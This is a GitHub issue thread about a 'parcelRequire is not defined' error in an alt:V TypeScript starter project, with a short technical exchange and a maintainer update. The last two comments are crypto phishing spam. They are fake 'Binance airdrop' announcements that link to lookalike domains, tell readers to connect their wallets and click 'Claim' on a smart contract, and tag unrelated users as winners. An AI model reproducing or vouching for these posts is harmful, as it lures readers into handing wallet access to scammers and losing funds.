### ISSUE TITLE
Client not working

### ISSUE THREAD

**Issue by MMaier96** [leNicDev/altv-typescript-starter#1]
Hey,

I imported your project and compiled it. Server is working fine but the client is not working.
Ingame when loading the resource for my client im getting this error:

`[18:44:56][Error]   ReferenceError: parcelRequire is not defined
    at parcelRequire.LSRl (client/startup.js:1:1001)
    at client/startup.js:1:1023`

Any ideas? :/

Kind regards
Marcel

**Comment by ithr0n** [comment]
Parcel does not support ES modules, see: https://github.com/parcel-bundler/parcel/issues/1401

Would be interesting how @leNicDev made it work for him.

**Comment by leNicDev** [comment]
Just updated the project. With that support for TypeScript 3.9 and the offical @altv/* types has been added.

**Comment by kongkiatchanu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @gabrielom, @Incede, @Al-Ka-Li, @rishi256, @davidp94, @gaspreth, @pragyasharmaa

**Comment by DavidGhedini** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Steven-Ens, @yulodl, @hamidabdulmalik, @housiqi66, @skpjr001, @pirdbunnie, @transitive-bullshit
